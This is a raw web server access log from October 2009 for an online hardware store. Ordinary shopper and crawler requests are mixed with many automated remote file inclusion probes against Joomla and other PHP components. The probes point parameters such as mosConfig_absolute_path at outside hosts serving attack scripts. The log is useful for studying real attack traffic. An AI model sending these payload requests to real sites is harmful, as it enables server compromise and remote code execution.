59.157.203.157 - - [17/Oct/2009:00:42:33 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:34 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:34 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:34 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:34 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:35 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:35 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:35 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:38 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
77.222.131.59 - - [17/Oct/2009:00:42:44 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:42:44 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:00:42:45 -0400] "GET /logs/access_log.Q109073100//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
166.205.5.24 - - [17/Oct/2009:00:42:40 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
209.59.12.99 - - [17/Oct/2009:00:43:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.152 - - [17/Oct/2009:00:43:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L015D554B27C9B800FCF806Q+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.75.245.36 - - [17/Oct/2009:00:43:36 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:00:43:36 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:00:43:36 -0400] "GET /logs/access_log.Q109073100//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
59.157.203.157 - - [17/Oct/2009:00:43:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG HTTP/1.1" 200 59585 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
67.166.159.189 - - [17/Oct/2009:00:43:29 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MSN 9.0;MSN 9"
59.157.203.157 - - [17/Oct/2009:00:43:51 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:43:51 -0400] "GET /images/items/9600027_THUMB.JPG HTTP/1.1" 200 2613 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:43:53 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:43:53 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:43:53 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
94.75.245.36 - - [17/Oct/2009:00:43:57 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
59.157.203.157 - - [17/Oct/2009:00:44:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:44:10 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
77.222.131.59 - - [17/Oct/2009:00:44:47 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:00:44:48 -0400] "GET /logs/access_log.Q109073100//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:00:44:48 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.43.202.66 - - [17/Oct/2009:00:44:58 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
211.43.202.66 - - [17/Oct/2009:00:44:58 -0400] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
59.157.203.157 - - [17/Oct/2009:00:45:07 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG HTTP/1.1" 200 49084 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:45:10 -0400] "GET /images/items/0501220_THUMB.JPG HTTP/1.1" 200 1923 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:45:10 -0400] "GET /images/items/0602046_THUMB.JPG HTTP/1.1" 200 2626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:45:10 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:45:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2131584949895300DDE9056+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:45:19 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
213.235.247.137 - - [17/Oct/2009:00:45:22 -0400] "GET /logs/error_log.Q109091600//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
213.235.247.137 - - [17/Oct/2009:00:45:22 -0400] "GET //include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
213.235.247.137 - - [17/Oct/2009:00:45:22 -0400] "GET /logs/access_log.Q109091600//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
213.235.247.137 - - [17/Oct/2009:00:45:23 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
213.235.247.137 - - [17/Oct/2009:00:45:27 -0400] "GET /logs/access_log.Q109091600%20//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
213.235.247.137 - - [17/Oct/2009:00:45:27 -0400] "GET /logs/error_log.Q109091600%20//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
213.235.247.137 - - [17/Oct/2009:00:45:39 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
213.235.247.137 - - [17/Oct/2009:00:45:40 -0400] "GET //include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
213.235.247.137 - - [17/Oct/2009:00:45:40 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
213.235.247.137 - - [17/Oct/2009:00:45:41 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
77.222.131.59 - - [17/Oct/2009:00:46:05 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
59.157.203.157 - - [17/Oct/2009:00:46:26 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2131584949D99300D4E9056+M37+ENG HTTP/1.1" 200 38026 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:46:28 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:46:33 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
70.85.145.234 - - [17/Oct/2009:00:46:39 -0400] "GET //include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.810"
70.85.145.234 - - [17/Oct/2009:00:46:44 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
70.85.145.234 - - [17/Oct/2009:00:46:50 -0400] "GET /logs/error_log.Q109091600//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
70.85.145.234 - - [17/Oct/2009:00:46:50 -0400] "GET /logs/access_log.Q109091600//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
70.85.145.234 - - [17/Oct/2009:00:47:11 -0400] "GET /logs/error_log.Q109091600%20//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
70.85.145.234 - - [17/Oct/2009:00:47:19 -0400] "GET /logs/access_log.Q109091600%20//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
82.193.15.3 - - [17/Oct/2009:00:47:32 -0400] "GET /logs/error_log.Q109072300%20%20/?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.85.145.234 - - [17/Oct/2009:00:47:33 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
70.85.145.234 - - [17/Oct/2009:00:47:34 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
70.85.145.234 - - [17/Oct/2009:00:47:36 -0400] "GET //include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.810"
70.85.145.234 - - [17/Oct/2009:00:47:53 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://leicestershirelink.co.uk//modules/xoopsgallery/cache/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
87.139.66.104 - - [17/Oct/2009:00:48:21 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:48:21 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:48:21 -0400] "GET /logs/access_log.Q109052700%20%20/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:48:23 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:48:23 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:48:23 -0400] "GET /logs/access_log.Q109071000/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:48:23 -0400] "GET /logs/access_log.Q109052700/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.139.66.104 - - [17/Oct/2009:00:48:27 -0400] "GET /logs/access_log.Q109071000%20%20/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:48:29 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:48:29 -0400] "GET /logs/access_log.Q109071000/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:48:29 -0400] "GET /logs/access_log.Q109052700/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:48:29 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:48:33 -0400] "GET /logs/access_log.Q109071000/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:48:33 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:48:33 -0400] "GET /logs/access_log.Q109052700/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:48:33 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:48:44 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:48:44 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:48:44 -0400] "GET /logs/access_log.Q109071000%20%20/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.218.40.180 - - [17/Oct/2009:00:48:48 -0400] "GET /logs/access_log.Q109052700%20%20/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:00:48:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.39.5.203 - - [17/Oct/2009:00:49:04 -0400] "GET /logs/access_log.Q109052700%20%20/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:49:04 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:49:04 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:00:49:12 -0400] "GET /logs/access_log.Q109090400//skin/dognara_gallery/setup.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:00:49:12 -0400] "GET /logs//skin/dognara_gallery/setup.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:00:49:12 -0400] "GET //skin/dognara_gallery/setup.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:49:13 -0400] "GET /logs/access_log.Q109052700/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:49:13 -0400] "GET /!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:49:13 -0400] "GET /logs/access_log.Q109071000/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:00:49:14 -0400] "GET /logs/?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
195.39.5.203 - - [17/Oct/2009:00:49:16 -0400] "GET /logs/!rfi%20/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:00:49:25 -0400] "GET /logs/access_log.Q109090400//skin/dognara_gallery/setup.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
